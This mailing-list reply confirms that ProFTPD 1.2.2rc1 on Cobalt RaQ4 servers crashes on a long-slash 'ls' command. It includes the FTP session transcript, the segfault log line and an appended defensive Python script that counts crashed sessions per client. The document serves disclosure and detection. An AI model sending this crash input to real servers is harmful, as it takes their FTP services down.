> Hello Mark,
> I have attempted to duplicate this bug, but have not been successful
> using the versions of Proftpd that are available from Sun/Cobalt's
> support site. Are you running a different version of ProFTPd than the
> ones published on the site? If so, please elaborate on the details so
> we can attempt to duplicate and validate the issue.

Nope. I'm running a bog standard Cobalt RaQ4 with all the packages from the
Support site installed and the Cobalt supplied version of ProFTPD running
without any modifications. It is vulnerable to this bug.
I've just confirmed this on 2 other RaQ4's that we have. Here's the info:
ftp 0
Connected to 0.
220 ProFTPD 1.2.2rc1 Server (ProFTPD) [xxx.xxxxxxxx.xxx]
Name (0:admin): XXXXX
331 Password required for XXXXX.
Password:
230 User XXXXX logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ///////////////
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
421 Service not available, remote server has closed connection
ftp> quit
tail /var/log/messages
Dec 20 09:11:47 xxx proftpd[4676]: xxx.xxxxxxxx.xxx (localhost[127.0.0.1]) - ProFTPD terminating (signal 11)
Regards,
Jonathan Michaelson
_________________
______________________________
cobalt-security mailing list
cobalt-security@xxxxxxxxxxxxxxx
http://list.cobalt.com/mailman/listinfo/cobalt-security
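
Added example (not part of the original message, and not Cobalt or ProFTPD code): a Python scan of syslog lines in the format quoted above that picks out FTP session processes that died on a crash signal and counts them per client address. The host names, addresses and the signal 15 line in SAMPLE are constructed, and the set of crash signals is an assumption based on Linux/x86 numbering.

```python
import re
from collections import Counter

# Linux/x86 signal numbers that mean a fault, not a requested shutdown
# (assumption: any other signal, e.g. 15, is an administrative stop).
CRASH_SIGNALS = {4: "SIGILL", 6: "SIGABRT", 7: "SIGBUS", 8: "SIGFPE", 11: "SIGSEGV"}

# Line shape taken from the /var/log/messages excerpt in the message above.
TERMINATED = re.compile(
    r"^(?P<when>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ proftpd\[(?P<pid>\d+)\]: "
    r"\S+ \((?P<client>[^\[]*)\[(?P<ip>[^\]]+)\]\) - "
    r"ProFTPD terminating \(signal (?P<sig>\d+)\)\s*$"
)

def find_crashes(lines):
    """Return one record per session process that died on a crash signal."""
    crashes = []
    for line in lines:
        m = TERMINATED.match(line)
        if not m:
            continue  # ordinary session traffic or another daemon
        sig = int(m.group("sig"))
        if sig in CRASH_SIGNALS:
            crashes.append({"when": m.group("when"), "pid": int(m.group("pid")),
                            "ip": m.group("ip"), "signal": CRASH_SIGNALS[sig]})
    return crashes

def repeat_offenders(lines, threshold=2):
    """Client addresses whose sessions crashed at least `threshold` times."""
    counts = Counter(c["ip"] for c in find_crashes(lines))
    return {ip: n for ip, n in counts.items() if n >= threshold}

# Constructed sample input in the same format as the quoted log line.
SAMPLE = [
    "Dec 20 09:11:47 raq4 proftpd[4676]: raq4.example.com (localhost[127.0.0.1]) - ProFTPD terminating (signal 11)",
    "Dec 20 09:12:03 raq4 proftpd[4680]: raq4.example.com (client.example.net[192.0.2.10]) - FTP session opened.",
    "Dec 20 09:12:09 raq4 proftpd[4680]: raq4.example.com (client.example.net[192.0.2.10]) - ProFTPD terminating (signal 11)",
    "Dec 20 09:12:31 raq4 proftpd[4691]: raq4.example.com (client.example.net[192.0.2.10]) - ProFTPD terminating (signal 11)",
    "Dec 20 09:15:00 raq4 proftpd[4500]: raq4.example.com (localhost[127.0.0.1]) - ProFTPD terminating (signal 15)",
]

if __name__ == "__main__":
    for crash in find_crashes(SAMPLE):
        print(crash["when"], crash["ip"], "pid", crash["pid"], crash["signal"])
    print("repeat offenders:", repeat_offenders(SAMPLE))
```

To run it against a live host, pass the lines of /var/log/messages to find_crashes instead of SAMPLE.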